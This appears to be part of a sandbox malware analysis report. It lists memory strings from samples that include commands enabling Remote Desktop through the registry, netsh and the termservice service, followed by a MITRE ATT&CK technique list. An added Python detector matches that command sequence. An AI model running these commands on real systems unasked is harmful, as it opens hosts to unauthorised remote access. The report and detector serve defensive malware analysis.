bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: zY9sqWs[1].exe.14.drString found in binary or memory: net start termservice
                                    Source: zY9sqWs[1].exe.14.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setbfbda6ae1db325c2ff4b455ce9896e6d6c7109f0f87b7e67c332588c3c6da69d652098acf55d6d3c9b14c606ca54406ebd6b79NYh4LeECDV5TDw6VM72ZcWhv1q0aDsaggrKm8wZyeFx=OX5CMv==VD1obCUxKX2vdL==MXWvdL==PIR4YXZmOZJXFK==S8i3dSVxBpWWQK==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsO60m0V==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfVSNp3lCL2AXjgHuH5Wrm3VGxV8SkciR53D==VrWwZ72nIx9HyIKFIynJNH2AEXyiV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsdsWxZBxwCCJ9VMKyZYJl20N=V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfUXhp2Jx9Igaj4LOz6q==K0WWRQJUKn yJOzwOV==YJGzcv==VJ WVv==S5WXb1R9esN9d7R9c8N9Zrl9Z2J9dLN9e1590L19Z2Z9cMZ9c7d9do1=Z8KoZx5o2Jy0PWzghHYl5Ar Z8KoZx5o2Jx=Z7yscx5o2Jx=0IF=0YF=0YJ=0YN=U1Gsbb==bMS3cyozBz==bMS3cCM BB9=02io0LyvZ72ndMNAc2OsfrmzM8G4aRV4QLN+QLR+M6CvdRdt2qNnLDtuJB==gF==KsWxaSQcQV==d7iobBwDCl6c3Ay=b7WBbhVwCCJmQAzjS7W3ThF4100dLXnqiLOuLQZofu==VMKyZYJl2XS 5AH4R00EUWQkK5 e5Bf9hrN=R20schE=T7GCcBVC35uXzyz93l==S0OIVv==VLGxZBEkK5Wb5RLgiMd=SL mdB9CyIedPa==R00KNEZzVB94OZyLQQPShre18K==Rrm3ZBVqPZ6cQRK=Ur BdB9yV7 zaB9DR7 wbXRzW7mxRBVqPZ6cQRK=NIFBMuQ5DmdWFK==drJ=e7J=R7 xdBVy4F2M6RDcTnuu7Qr2eVyf8rLy0r BbN1oO0S FsD g8OvSAzAiRXrGWVwMX1wLN0xEVqGbX54PZ6SCOTgh8uw6Wf2eU6sJmwpc8KwLRRl4JFZzA79g1N BgLjhEBgJCwpb1yobhFxPW1aJl1NQX9y4JWm5w3Lj2umHcvjgFyq60IkeLmybd9zO6Sd5w3qiMCmRQUPGeXIEVpwLN0xBV1=MX1QCb==Q8Omce0BMrqzZr==R7 xdBVy4F2M6RDcTnui6BvueUKf9Kgycn 7LSd74B2e3XLkQ2Oz5APw206iU0L=V6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5HWakhMO1SRDQ2UYjSIIyc2C4dBVCJpGlQK==R7 
wcCV4P0KGPQ3cZ1KmZBVqP5ih2gvjg1Yw6BzAg1OZ9r97f2pzMOIDDGVUEtiWQ01=M2WxaRNzPJVlV6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5MQ7giLOlOgfm3U6aL44RWKKSTAx0IXSxKVy=V6mWVzVRNHOn3hTpg7qUSRKyQBCaP6QBermmZSNgGpGr2QPvf2Gx5Az71DWnUKQyWrmnZR9NHD==YIBzMyA=SLWpYSVw4IOd5BTggr7AEfbU3VKt7LQ3b1 xSLWpYSVw4IOd5BTggr7AEffU3VKt7LQ3b1 xV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8NjTgRgG6Wq4gXliKSm6hHrf01=VMKyZCVn4H6 3QW=NoBAOL==NoBBMb==NoBANb==NoBBNL==R8WBchVy4HKT2QzbYF==Pop9dsWxZBxwCCJmQRjcM7tjJsSkcXtv1ZykzwadNH2q5MukJnBpJdB41Z2d3XXRNIxhCcSi3ESqDE==KnZjRSht4FJ=JnBpJdBCPZ59JHZpIv==VL 6ZSJD1JWk3w7cjLN=M1W7ZRN54Jmn3hDmgLek8MvA3UYt9KQCb1exZRQkBX0h3AW8Nl==Jl==d7i4dBRz4559CRO8Q2JhFu==d8Rbcr==drGxZB9xT7W8Yh9l3pR9KAHWg8O1QzvA3UutT0L=NIBzMyA4CWl=NIBzMyA4CmJ=NIBzMyA4CmN=NIBzMyA4C5Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: zY9sqWs.exe.14.drString found in binary or memory: net start termservice
                                    Source: zY9sqWs.exe.14.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setbfbda6ae1db325c2ff4b455ce9896e6d6c7109f0f87b7e67c332588c3c6da69d652098acf55d6d3c9b14c606ca54406ebd6b79NYh4LeECDV5TDw6VM72ZcWhv1q0aDsaggrKm8wZyeFx=OX5CMv==VD1obCUxKX2vdL==MXWvdL==PIR4YXZmOZJXFK==S8i3dSVxBpWWQK==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsO60m0V==V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfVSNp3lCL2AXjgHuH5Wrm3VGxV8SkciR53D==VrWwZ72nIx9HyIKFIynJNH2AEXyiV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeYlSsdsWxZBxwCCJ9VMKyZYJl20N=V5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8OfQYVC3pWm5z1chsGq5WZeVVeu7K4B02KfUXhp2Jx9Igaj4LOz6q==K0WWRQJUKn yJOzwOV==YJGzcv==VJ WVv==S5WXb1R9esN9d7R9c8N9Zrl9Z2J9dLN9e1590L19Z2Z9cMZ9c7d9do1=Z8KoZx5o2Jy0PWzghHYl5Ar Z8KoZx5o2Jx=Z7yscx5o2Jx=0IF=0YF=0YJ=0YN=U1Gsbb==bMS3cyozBz==bMS3cCM BB9=02io0LyvZ72ndMNAc2OsfrmzM8G4aRV4QLN+QLR+M6CvdRdt2qNnLDtuJB==gF==KsWxaSQcQV==d7iobBwDCl6c3Ay=b7WBbhVwCCJmQAzjS7W3ThF4100dLXnqiLOuLQZofu==VMKyZYJl2XS 5AH4R00EUWQkK5 e5Bf9hrN=R20schE=T7GCcBVC35uXzyz93l==S0OIVv==VLGxZBEkK5Wb5RLgiMd=SL mdB9CyIedPa==R00KNEZzVB94OZyLQQPShre18K==Rrm3ZBVqPZ6cQRK=Ur BdB9yV7 zaB9DR7 wbXRzW7mxRBVqPZ6cQRK=NIFBMuQ5DmdWFK==drJ=e7J=R7 xdBVy4F2M6RDcTnuu7Qr2eVyf8rLy0r BbN1oO0S FsD g8OvSAzAiRXrGWVwMX1wLN0xEVqGbX54PZ6SCOTgh8uw6Wf2eU6sJmwpc8KwLRRl4JFZzA79g1N BgLjhEBgJCwpb1yobhFxPW1aJl1NQX9y4JWm5w3Lj2umHcvjgFyq60IkeLmybd9zO6Sd5w3qiMCmRQUPGeXIEVpwLN0xBV1=MX1QCb==Q8Omce0BMrqzZr==R7 xdBVy4F2M6RDcTnui6BvueUKf9Kgycn 7LSd74B2e3XLkQ2Oz5APw206iU0L=V6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5HWakhMO1SRDQ2UYjSIIyc2C4dBVCJpGlQK==R7 
wcCV4P0KGPQ3cZ1KmZBVqP5ih2gvjg1Yw6BzAg1OZ9r97f2pzMOIDDGVUEtiWQ01=M2WxaRNzPJVlV6mWVzVRNHOT4hLcgsKE5WZ2gk6qP6Q3YJOybiRC25y5MQ7giLOlOgfm3U6aL44RWKKSTAx0IXSxKVy=V6mWVzVRNHOn3hTpg7qUSRKyQBCaP6QBermmZSNgGpGr2QPvf2Gx5Az71DWnUKQyWrmnZR9NHD==YIBzMyA=SLWpYSVw4IOd5BTggr7AEfbU3VKt7LQ3b1 xSLWpYSVw4IOd5BTggr7AEffU3VKt7LQ3b1 xV5 JVAdFKnW5KQnahr2A5WT21Dan7qMye8NjTgRgG6Wq4gXliKSm6hHrf01=VMKyZCVn4H6 3QW=NoBAOL==NoBBMb==NoBANb==NoBBNL==R8WBchVy4HKT2QzbYF==Pop9dsWxZBxwCCJmQRjcM7tjJsSkcXtv1ZykzwadNH2q5MukJnBpJdB41Z2d3XXRNIxhCcSi3ESqDE==KnZjRSht4FJ=JnBpJdBCPZ59JHZpIv==VL 6ZSJD1JWk3w7cjLN=M1W7ZRN54Jmn3hDmgLek8MvA3UYt9KQCb1exZRQkBX0h3AW8Nl==Jl==d7i4dBRz4559CRO8Q2JhFu==d8Rbcr==drGxZB9xT7W8Yh9l3pR9KAHWg8O1QzvA3UutT0L=NIBzMyA4CWl=NIBzMyA4CmJ=NIBzMyA4CmN=NIBzMyA4C5Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
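The recurring strings above are the parts of a routine that switches Remote Desktop on: fDenyTSConnections under SYSTEM\CurrentControlSet\Control\Terminal Server (cleared to 0 to allow connections), netsh advfirewall enabling the "Remote Desktop" rule group, sc config termservice to set the Terminal Services start type, and net start termservice to start it. Any one of these commands is ordinary administration; the signal is several of them spawned by the same parent process within seconds. The following detection is an added example, not part of the Joe Sandbox report or the sample: it parses constructed Sysmon Event ID 1 style lines (timestamp|pid|ppid|parent image|image|command line, a format assumed for the example), classifies each command line against the four stages, and alerts when one parent produces at least two distinct stages inside a 120 second window (threshold and window are assumptions). The constructed log includes benign lines, among them a reg add that sets fDenyTSConnections to 1, which must not fire.

```python
"""Correlate process-creation events for the RDP-enabling command sequence
whose strings appear in the sample's memory (fDenyTSConnections, the netsh
"Remote Desktop" rule group, sc config termservice, net start termservice).
Added example; log format, window and threshold are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per stage, matched against the lower-cased command line. The
# report's strings are the templates; quoting, .exe suffixes and the net1
# alias are tolerated so trivial variations do not evade the match.
STAGES = {
    "reg_allow_ts": re.compile(
        r"\breg(?:\.exe)?\s+add\s+.*terminal server.*"
        r"/v\s+fdenytsconnections\b.*/d\s+0+\b"),
    "fw_enable_rdp": re.compile(
        r"\bnetsh(?:\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\s+"
        r"group=[\"']?remote desktop[\"']?\s+new\s+enable=yes\b"),
    "svc_config": re.compile(r"\bsc(?:\.exe)?\s+config\s+termservice\b"),
    "svc_start": re.compile(r"\bnet1?(?:\.exe)?\s+start\s+termservice\b"),
}
WINDOW = timedelta(seconds=120)  # assumed correlation window
MIN_STAGES = 2                   # assumed alert threshold

# Constructed Sysmon Event ID 1 style lines: ts|pid|ppid|parent image|image|cmdline.
# Parent 4812 stands for the dropped payload; all paths are invented for the example.
SAMPLE_LOG = [
    "2025-03-10T09:14:02|5120|4812|C:\\Users\\user\\AppData\\Local\\Temp\\rapes.exe"
    "|C:\\Windows\\System32\\netsh.exe"
    "|netsh advfirewall firewall set rule group=\"Remote Desktop\" new enable=Yes",
    "2025-03-10T09:14:03|5128|4812|C:\\Users\\user\\AppData\\Local\\Temp\\rapes.exe"
    "|C:\\Windows\\System32\\sc.exe|sc config termservice start= auto",
    "2025-03-10T09:14:04|5136|4812|C:\\Users\\user\\AppData\\Local\\Temp\\rapes.exe"
    "|C:\\Windows\\System32\\net.exe|net start termservice",
    # benign administration from another parent: must not alert
    "2025-03-10T09:20:11|6001|3300|C:\\Windows\\System32\\cmd.exe"
    "|C:\\Windows\\System32\\net.exe|net start spooler",
    "2025-03-10T09:20:30|6002|3300|C:\\Windows\\System32\\cmd.exe"
    "|C:\\Windows\\System32\\reg.exe"
    "|reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\""
    " /v fDenyTSConnections /t REG_DWORD /d 1 /f",
    # a single stage from a third parent: below threshold
    "2025-03-10T09:31:00|7001|2200|C:\\Windows\\System32\\cmd.exe"
    "|C:\\Windows\\System32\\sc.exe|sc config termservice start= demand",
]


def parse_event(line):
    """Split one constructed log line into its fields."""
    ts, pid, ppid, parent_image, image, cmdline = line.split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid), "ppid": int(ppid),
            "parent_image": parent_image, "image": image, "cmdline": cmdline}


def classify(cmdline):
    """Return the stage name a command line matches, or None."""
    low = cmdline.lower()
    for name, rx in STAGES.items():
        if rx.search(low):
            return name
    return None


def detect_rdp_enablement(lines):
    """Group stage hits by parent PID; emit one alert per parent whose hits
    cover at least MIN_STAGES distinct stages within WINDOW."""
    by_parent = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        stage = classify(ev["cmdline"])
        if stage:
            by_parent[ev["ppid"]].append((ev["ts"], stage, ev))
    alerts = []
    for ppid, hits in by_parent.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _, _) in enumerate(hits):
            # sliding window anchored on each hit in turn
            cluster = [h for h in hits[i:] if h[0] - t0 <= WINDOW]
            stages = {h[1] for h in cluster}
            if len(stages) >= MIN_STAGES:
                alerts.append({"ppid": ppid,
                               "parent_image": cluster[0][2]["parent_image"],
                               "stages": stages,
                               "first": cluster[0][0], "last": cluster[-1][0]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_enablement(SAMPLE_LOG):
        print(f"RDP enablement by ppid {a['ppid']} ({a['parent_image']}): "
              f"{sorted(a['stages'])} between {a['first']} and {a['last']}")
```

The registry stage only shows up in a command line if the payload shells out to reg.exe. The report lists the key path and the value name but no reg add command line, so the value is most likely written directly through the registry API; a registry value-set event on that path (Sysmon Event ID 13) is the complementary telemetry for that stage, and the same correlation by parent process applies to it.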
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004A1204
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004A1806
MITRE ATT&CK Matrix

Techniques grouped by tactic (reconstructed from the flattened matrix; a leading number is the superscript marker the report shows beside that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: 211 Scripting; Domains; DNS Server; Virtual Private Server
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: 121 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; 11 Scheduled Task/Job
Persistence: 211 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 11 Scheduled Task/Job
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information
Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager
Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery
Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: 11 Archive Collected Data; 41 Data from Local System; 1 Email Collection
